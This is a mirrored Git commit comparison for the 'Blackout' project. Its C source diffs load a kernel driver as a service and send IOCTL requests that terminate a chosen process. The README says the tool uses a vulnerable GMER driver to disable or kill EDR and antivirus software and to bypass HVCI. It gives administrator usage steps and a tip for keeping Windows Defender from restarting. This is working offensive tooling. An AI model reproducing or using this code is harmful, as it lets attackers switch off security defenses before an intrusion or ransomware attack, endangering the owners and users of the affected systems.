mirror of
https://github.com/ZeroMemoryEx/Blackout
synced 2026-08-09 12:24:34 +00:00
Compare commits
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
50dc20f50a | ||
|
|
e0c6aedfd4 | ||
|
|
4997529f7b | ||
|
|
aae0439161 | ||
|
|
fc721766ed | ||
|
|
50827a5425 | ||
|
|
7d6af8c33a | ||
|
|
9ed4bae284 | ||
|
|
210c4a947f | ||
|
|
0fa505b1e5 | ||
|
|
02339dee43 | ||
|
|
4dfd07825a | ||
|
|
0fedba898a | ||
|
|
ec49f4d3f9 |
+60
-35
@@ -8,26 +8,58 @@
|
||||
|
||||
#define TERMINSTE_PROCESS_IOCTL_CODE 0x9876C094
|
||||
|
||||
int
|
||||
BOOL
|
||||
LoadDriver(
|
||||
char* driverPath
|
||||
)
|
||||
)
|
||||
{
|
||||
SC_HANDLE hSCM, hService;
|
||||
const char* serviceName = "Blackout";
|
||||
|
||||
// Open a handle to the SCM database
|
||||
hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
|
||||
hSCM = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS);
|
||||
if (hSCM == NULL) {
|
||||
printf("OpenSCManager failed %X\n", GetLastError());
|
||||
return (-1);
|
||||
return (1);
|
||||
}
|
||||
|
||||
// Check if the service already exists
|
||||
hService = OpenServiceA(hSCM, serviceName, SERVICE_ALL_ACCESS);
|
||||
if (hService != NULL)
|
||||
{
|
||||
printf("Service already exists.\n");
|
||||
|
||||
// Start the service if it's not running
|
||||
SERVICE_STATUS serviceStatus;
|
||||
if (!QueryServiceStatus(hService, &serviceStatus))
|
||||
{
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCM);
|
||||
return (1);
|
||||
}
|
||||
|
||||
if (serviceStatus.dwCurrentState == SERVICE_STOPPED)
|
||||
{
|
||||
if (!StartServiceA(hService, 0, nullptr))
|
||||
{
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCM);
|
||||
return (1);
|
||||
}
|
||||
|
||||
printf("Starting service...\n");
|
||||
}
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCM);
|
||||
return (0);
|
||||
}
|
||||
|
||||
// Create the service
|
||||
hService = CreateServiceA(
|
||||
hSCM,
|
||||
serviceName,
|
||||
serviceName,
|
||||
SERVICE_START | DELETE | SERVICE_STOP,
|
||||
SERVICE_ALL_ACCESS,
|
||||
SERVICE_KERNEL_DRIVER,
|
||||
SERVICE_DEMAND_START,
|
||||
SERVICE_ERROR_IGNORE,
|
||||
@@ -40,30 +72,30 @@ LoadDriver(
|
||||
);
|
||||
|
||||
if (hService == NULL) {
|
||||
if (GetLastError() == 1073)
|
||||
{
|
||||
StartServiceA(hService, 0, nullptr);
|
||||
printf("starting service ..\n");
|
||||
return (0);
|
||||
}
|
||||
else
|
||||
printf("CreateService failed %X\n", GetLastError());
|
||||
return (-1);
|
||||
CloseServiceHandle(hSCM);
|
||||
return (1);
|
||||
}
|
||||
|
||||
printf("Service created successfully.\n");
|
||||
|
||||
StartServiceA(hService, 0, nullptr);
|
||||
// Start the service
|
||||
if (!StartServiceA(hService, 0, nullptr))
|
||||
{
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCM);
|
||||
return (1);
|
||||
}
|
||||
|
||||
printf("starting service ..\n");
|
||||
printf("Starting service...\n");
|
||||
|
||||
CloseServiceHandle(hService);
|
||||
CloseServiceHandle(hSCM);
|
||||
|
||||
return 0;
|
||||
return (0);
|
||||
}
|
||||
|
||||
|
||||
|
||||
BOOL
|
||||
CheckProcess(
|
||||
DWORD pn)
|
||||
@@ -128,7 +160,7 @@ GetPID(
|
||||
int
|
||||
main(
|
||||
int argc,
|
||||
char **argv
|
||||
char** argv
|
||||
) {
|
||||
|
||||
if (argc != 3) {
|
||||
@@ -146,8 +178,8 @@ main(
|
||||
printf("provided process id doesnt exist !!\n");
|
||||
return (-1);
|
||||
}
|
||||
|
||||
|
||||
|
||||
|
||||
WIN32_FIND_DATAA fileData;
|
||||
HANDLE hFind;
|
||||
char FullDriverPath[MAX_PATH];
|
||||
@@ -163,7 +195,7 @@ main(
|
||||
printf("path not found !!\n");
|
||||
return(-1);
|
||||
}
|
||||
}
|
||||
}
|
||||
else {
|
||||
printf("driver not found !!\n");
|
||||
return(-1);
|
||||
@@ -190,7 +222,7 @@ main(
|
||||
DWORD output[2] = { 0 };
|
||||
DWORD outputSize = sizeof(output);
|
||||
|
||||
BOOL result = DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);//0x9876C094
|
||||
BOOL result = DeviceIoControl(hDevice, INITIALIZE_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);
|
||||
if (!result)
|
||||
{
|
||||
printf("faild to send initializing request %X !!\n", INITIALIZE_IOCTL_CODE);
|
||||
@@ -208,7 +240,7 @@ main(
|
||||
{
|
||||
if (!DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL))
|
||||
{
|
||||
printf("DeviceIoControl failed. Error: %X !!\n",GetLastError());
|
||||
printf("DeviceIoControl failed. Error: %X !!\n", GetLastError());
|
||||
CloseHandle(hDevice);
|
||||
return (-1);
|
||||
}
|
||||
@@ -224,26 +256,19 @@ main(
|
||||
}
|
||||
}
|
||||
|
||||
printf("terminating process !! \n");
|
||||
|
||||
result = DeviceIoControl(hDevice, TERMINSTE_PROCESS_IOCTL_CODE, &input, sizeof(input), output, outputSize, &bytesReturned, NULL);
|
||||
|
||||
if (!result)
|
||||
{
|
||||
printf("DeviceIoControl failed. Error: %X !!\n", GetLastError());
|
||||
CloseHandle(hDevice);
|
||||
return (-1);
|
||||
}
|
||||
|
||||
printf("terminating process !! \n");
|
||||
|
||||
if (!output){}
|
||||
else
|
||||
{
|
||||
printf("error while terminating process !!\n");
|
||||
printf("failed to terminate process: %X !!\n", GetLastError());
|
||||
CloseHandle(hDevice);
|
||||
return (-1);
|
||||
}
|
||||
|
||||
printf("process has been terminated!\n");
|
||||
|
||||
system("pause");
|
||||
|
||||
CloseHandle(hDevice);
|
||||
|
||||
@@ -1,9 +1,12 @@
|
||||
# Blackout
|
||||
|
||||
* leveraging gmer driver to effectively disabling or killing EDRs and AVs.
|
||||
|
||||
* it bypass HVCI fluently
|
||||
* the sample is sourced from loldrivers https://www.loldrivers.io/drivers/7ce8fb06-46eb-4f4f-90d5-5518a6561f15/
|
||||
# usage
|
||||
|
||||
* Place the driver `Blackout.sys` in the same path as the executable
|
||||
* The executable should be run in the context of an administrator
|
||||
* Blackout.exe -p <process_id>
|
||||
* for windows defender keep the program running to prevent the service from restarting it
|
||||
|
||||
|
||||
Binary file not shown.
@@ -0,0 +1 @@
|
||||
* Place the driver in the same path as the executable
|
||||
Reference in New Issue
Block a user